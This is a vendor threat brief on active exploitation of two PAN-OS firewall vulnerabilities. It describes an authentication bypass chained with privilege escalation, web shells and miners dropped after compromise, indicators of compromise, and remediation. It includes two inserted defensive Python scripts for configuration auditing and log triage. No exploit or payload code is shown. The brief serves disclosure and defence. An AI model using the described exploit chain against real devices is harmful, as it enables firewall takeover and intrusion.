
Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22)


Executive Summary

Palo Alto Networks and Unit 42 continue to track exploitation activity related to CVE-2024-0012 and CVE-2024-9474. We are working with external researchers, partners and customers to share information transparently and rapidly.

Fixes for both vulnerabilities are available. Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for additional details about recommended solutions and affected products.

An authentication bypass in Palo Alto Networks PAN-OS software (CVE-2024-0012) enables an unauthenticated attacker with network access to the management interface to gain PAN-OS administrator privileges. This could allow an adversary to perform administrative actions, tamper with the configuration or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474.

The risk of these issues is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines.

Palo Alto Networks has actively monitored and worked with customers to identify and further minimize the very small number of PAN-OS devices with management web interfaces exposed to the internet or other untrusted networks.

Palo Alto Networks originally identified threat activity potentially exploiting CVE-2024-0012 and CVE-2024-9474 against a limited number of management web interfaces. Palo Alto Networks continues to track additional threat activity following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024. The Current Scope of the Attack section includes more information about the observed activity. Information about observed indicators and surrounding context is available in the Indicators of Compromise section, while a more complete list of IOCs is available at the Unit42-Timely-Threat-Intel GitHub.

We are tracking the initial exploitation of this vulnerability under the name Operation Lunar Peek.

If you haven’t already, Palo Alto Networks also strongly recommends that customers secure access to your management interface according to our recommended best practice deployment guidelines. Specifically, you should restrict access to the management interface to only trusted internal IP addresses to prevent external access from the internet. The vast majority of firewalls already follow Palo Alto Networks and industry best practices.

Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for up-to-date information about affected products and versions, as well as more remediation guidance.

For assistance related to a potential compromise, please reach out to Palo Alto Networks support. Unit 42 Retainer customers can reach out to Unit 42 directly.

Vulnerabilities Discussed: CVE-2024-0012, CVE-2024-9474

Details of the CVE-2024-0012 and CVE-2024-9474 Vulnerabilities

An authentication bypass in Palo Alto Networks PAN-OS software (CVE-2024-0012) enables an unauthenticated attacker with network access to the management interface to gain PAN-OS administrator privileges. This could allow an adversary to perform administrative actions, tamper with the configuration or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474.

The risk of these issues is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines.

Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for up-to-date information about affected products and versions, as well as more remediation guidance.

Current Scope of the Attack

Palo Alto Networks originally identified threat activity targeting a limited number of device management web interfaces. This original activity, reported on Nov. 18, 2024, primarily originated from IP addresses known to proxy/tunnel traffic for anonymous VPN services.

Unit 42 is actively clustering and characterizing this originally observed threat activity. Originally observed post-exploitation activity included interactive command execution and dropping malware, such as web shells, on the firewall.

Web shell payloads recovered from compromised firewalls were obfuscated. One decoded payload sample (SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668) is presented below:

The following user-agent string has been observed during multiple actor exploit attempts:

User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko

Unit 42 recommends monitoring for and investigating any suspicious or otherwise abnormal activity on devices with a management web interface exposed to the internet, as exact post-compromise activity and payloads may vary.

Palo Alto Networks is still actively investigating and remediating all identified threat activity. Palo Alto Networks observed a notable increase in threat activity following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024. At this time, Unit 42 assesses with high confidence that a functional exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly available, which will enable broader threat activity.

Unit 42 also continues to observe both manual and automated scanning activity aligning with the timeline of third-party artifacts becoming widely available. In agreement with third-party reporting, Unit 42 has also observed increased diversity of post-compromise activity, including additional payloads such as open-source C2 tools and cryptocurrency miners.

A list of IP addresses and surrounding context are available in Indicators of Compromise, while a more complete list of IOCs is available at the Unit42-Timely-Threat-Intel GitHub.

Unit 42 will continue to update this additional information as relevant data is available and sharable.

Remediation Guidance

Palo Alto Networks recommends that customers update to receive the latest patches that fix CVE-2024-0012 and CVE-2024-9474. Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for up-to-date information about affected products and versions.

If you haven’t already, Palo Alto Networks also strongly recommends that customers secure access to your management interface according to our recommended best practice deployment guidelines. Specifically, you should restrict access to the management interface to only trusted internal IP addresses to prevent external access from the internet. The vast majority of firewalls already follow Palo Alto Networks and industry best practices.
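The best-practice recommendation above (and in the Executive Summary) is to restrict management access to trusted internal IP addresses. The following is an added example, not Palo Alto Networks or Unit 42 code, that audits a PAN-OS configuration export for the two places that restriction lives: the permitted-ip list for the dedicated MGT port and the permitted-ip list of any interface management profile bound to a dataplane interface. The XML element paths (deviceconfig/system/permitted-ip, network/profiles/interface-management-profile, layer3/interface-management-profile) are assumed from the layout of a running-config export and should be checked against your own export; the sample configuration is constructed.

```python
"""Audit a PAN-OS configuration export for management-plane exposure.

Added example (not Palo Alto Networks or Unit 42 code). It assumes the XML
layout of a PAN-OS running-config export: deviceconfig/system/permitted-ip
for the MGT port and network/profiles/interface-management-profile for
dataplane interfaces. Verify those element paths against your own export.
"""
import ipaddress
import xml.etree.ElementTree as ET

# Constructed sample export: the MGT port is restricted, but ethernet1/1
# carries a management profile that exposes HTTPS and SSH to any source.
SAMPLE_CONFIG = """<config version="10.2.0">
  <devices><entry name="localhost.localdomain">
    <deviceconfig><system>
      <permitted-ip><entry name="10.1.1.0/24"/></permitted-ip>
    </system></deviceconfig>
    <network>
      <profiles><interface-management-profile>
        <entry name="mgmt-open"><https>yes</https><ssh>yes</ssh></entry>
        <entry name="mgmt-locked"><https>yes</https>
          <permitted-ip><entry name="10.1.1.5/32"/></permitted-ip>
        </entry>
      </interface-management-profile></profiles>
      <interface><ethernet>
        <entry name="ethernet1/1"><layer3>
          <interface-management-profile>mgmt-open</interface-management-profile>
        </layer3></entry>
        <entry name="ethernet1/2"><layer3>
          <interface-management-profile>mgmt-locked</interface-management-profile>
        </layer3></entry>
      </ethernet></interface>
    </network>
  </entry></devices>
</config>"""

MGMT_SERVICES = ("https", "http", "ssh", "telnet")
DEVICE = "./devices/entry"


def _permitted_ips(node):
    """permitted-ip entries under node; an empty list means 'any source'."""
    return [e.get("name") for e in node.findall("permitted-ip/entry")]


def _too_broad(cidr):
    """True for entries such as 0.0.0.0/0 that restrict nothing."""
    try:
        return ipaddress.ip_network(cidr, strict=False).prefixlen == 0
    except ValueError:
        return True  # unparsable entry: surface it rather than trust it


def audit_management_exposure(config_xml):
    """Return (severity, message) findings for a PAN-OS config export."""
    root = ET.fromstring(config_xml)
    findings = []

    # 1. Dedicated MGT port: no permitted-ip list means any source may connect.
    system = root.find(DEVICE + "/deviceconfig/system")
    mgt_ips = _permitted_ips(system) if system is not None else []
    if not mgt_ips:
        findings.append(("high", "MGT interface has no permitted-ip list: reachable from any source"))
    for cidr in mgt_ips:
        if _too_broad(cidr):
            findings.append(("high", f"MGT permitted-ip {cidr} allows any source"))

    # 2. Dataplane interfaces that expose management through a profile.
    profiles = {}
    for prof in root.findall(DEVICE + "/network/profiles/interface-management-profile/entry"):
        enabled = [s for s in MGMT_SERVICES if prof.findtext(s) == "yes"]
        profiles[prof.get("name")] = (enabled, _permitted_ips(prof))

    for iface in root.findall(DEVICE + "/network/interface/ethernet/entry"):
        prof_name = iface.findtext("layer3/interface-management-profile")
        if prof_name not in profiles:
            continue
        enabled, ips = profiles[prof_name]
        if not enabled:
            continue
        name = iface.get("name")
        if "http" in enabled or "telnet" in enabled:
            findings.append(("medium", f"{name}: profile {prof_name} enables cleartext management"))
        if not ips:
            findings.append(("high", f"{name}: profile {prof_name} exposes {','.join(enabled)} with no permitted-ip restriction"))
        for cidr in ips:
            if _too_broad(cidr):
                findings.append(("high", f"{name}: profile {prof_name} permitted-ip {cidr} allows any source"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_management_exposure(SAMPLE_CONFIG):
        print(f"[{severity}] {message}")
```

On the constructed sample the MGT port passes, and the single finding is ethernet1/1, whose profile enables HTTPS and SSH without a permitted-ip list. The dataplane check matters because a management profile on an internet-facing interface exposes the same web interface as the MGT port; locking down only deviceconfig/system/permitted-ip leaves that path open.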

Conclusion

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Palo Alto Networks customers are better protected by our products, as listed below. We will update this threat brief as more relevant information becomes available.

Palo Alto Networks Product Protections for CVE-2024-0012 and CVE-2024-9474

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

For assistance related to a potential compromise, please reach out to Palo Alto Networks support. Unit 42 Retainer customers can reach out to the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Indicators of Compromise

Command and Control Infrastructure

An increasing number of threat actor IP addresses has been identified scanning and/or connecting to management web interfaces in attempts to exploit CVE-2024-0012 and CVE-2024-9474.

Many of these IP addresses have been known to proxy/tunnel traffic for anonymous VPN services, which may include legitimate user activity originating from these IPs to other destinations.

Unit 42 has also observed both manual and automated scanning originating from various IP addresses. This activity has greatly increased in volume and scope following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024.

A more complete list of observed IP addresses is available at the Unit42-Timely-Threat-Intel GitHub. Unit 42 will continue to update relevant values as additional information is available and sharable.

Post-Exploitation Artifacts

SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668
Context: PHP web shell payload dropped on a compromised firewall. A decoded view of this payload is available in the Current Scope of the Attack section.

User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko
Context: User-agent string observed during multiple actor exploit attempts.
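The Current Scope of the Attack section recommends monitoring devices with an exposed management web interface, and the artifacts above give two concrete things to match on: the user-agent string and the payload hash. The following is an added example, not Unit 42 code, that runs those checks over access-log lines. The log lines are constructed in Common Log Format with a trailing User-Agent field, which is the format of a typical reverse proxy or log export rather than PAN-OS's own logs, so the regex will need adapting; the trusted network allowlist and the request paths are assumptions. The example matches the user-agent string exactly as printed in this brief (with "rv 11.0"); a genuine Internet Explorer 11 user-agent carries "rv:11.0", so confirm the exact form against the GitHub IOC list before relying on the match.

```python
"""Flag management-interface requests that match this brief's indicators.

Added example (not Unit 42 code). Log lines below are constructed in
Common Log Format plus a User-Agent field; adapt LOG_RE to the logs you
actually have in front of the management interface. The user-agent
string and SHA256 are the indicators from the brief; TRUSTED_NETS and
the request paths are assumptions.
"""
import hashlib
import ipaddress
import re

# Indicators published in this brief.
IOC_USER_AGENT = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko"
IOC_SHA256 = "3c5f9034c86cb1952aa5bb07b4f77ce7d8bb5cc9fe5c029a32c72adc7e814668"

# Assumed allowlist: the only networks that should ever reach management.
TRUSTED_NETS = [ipaddress.ip_network("10.1.1.0/24")]

# Common Log Format with referer and user-agent appended (assumed layout).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample: a trusted admin, an untrusted source using the
# observed user-agent, an untrusted source with a benign user-agent, and
# one line the parser cannot read.
SAMPLE_LOG = """\
10.1.1.5 - - [20/Nov/2024:10:01:02 +0000] "GET /php/login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"
203.0.113.7 - - [20/Nov/2024:10:02:15 +0000] "GET /php/login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko"
198.51.100.9 - - [20/Nov/2024:10:03:44 +0000] "POST /php/login.php HTTP/1.1" 302 0 "-" "curl/8.4.0"
this line is not parseable
"""


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_trusted(src):
    """True if src is an address inside one of the trusted networks."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def triage_log(text):
    """Return (findings, unparsed_count).

    Every request from an untrusted source is a finding on its own, since
    the management interface should not be reachable from there at all;
    the user-agent match is added as a second reason when present.
    Unparsable lines are counted so a format mismatch is visible.
    """
    findings, unparsed = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        reasons = []
        if not is_trusted(rec["src"]):
            reasons.append("source outside trusted management networks")
        if rec["ua"] == IOC_USER_AGENT:
            reasons.append("user-agent matches string seen in exploit attempts")
        if reasons:
            findings.append({"src": rec["src"], "ts": rec["ts"], "path": rec["path"], "reasons": reasons})
    return findings, unparsed


def matches_ioc_hash(data):
    """True if data hashes to the decoded web shell payload listed above."""
    return hashlib.sha256(data).hexdigest() == IOC_SHA256


if __name__ == "__main__":
    found, skipped = triage_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['src']} {f['path']}: {'; '.join(f['reasons'])}")
    print(f"unparsed lines: {skipped}")
```

Two of the three parsed requests are flagged: the 203.0.113.7 request for both an untrusted source and the observed user-agent, and the 198.51.100.9 request for the untrusted source alone. Treating any untrusted source as a finding, rather than only the user-agent match, reflects the brief's note that post-compromise activity and payloads vary; the user-agent is a useful confirmation, not a prerequisite. matches_ioc_hash is for files recovered from the device (for example, from a support bundle), where the SHA256 is the stable indicator.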

Additional Resources

Updated Nov. 19, 2024 at 3:00 P.M. PST to add clarifying language to the Executive Summary, expand the Current Scope of the Attack section, and add new IoCs.

Updated Nov. 20, 2024 at 3:25 P.M. PST to make additions to the Executive Summary, the Current Scope of the Attack section, and to add new IoCs.

Updated Nov. 21, 2024 at 3:24 P.M. PST to add user-agent string to Scope of the Attack section and Artifacts subsection in IoCs section. Additional IoCs were added to GitHub and users redirected there. Edited for consistency and clarity.

Updated Nov. 22, 2024 at 3:05 P.M. PST to add additional detail on the diversity of post-compromise activity.
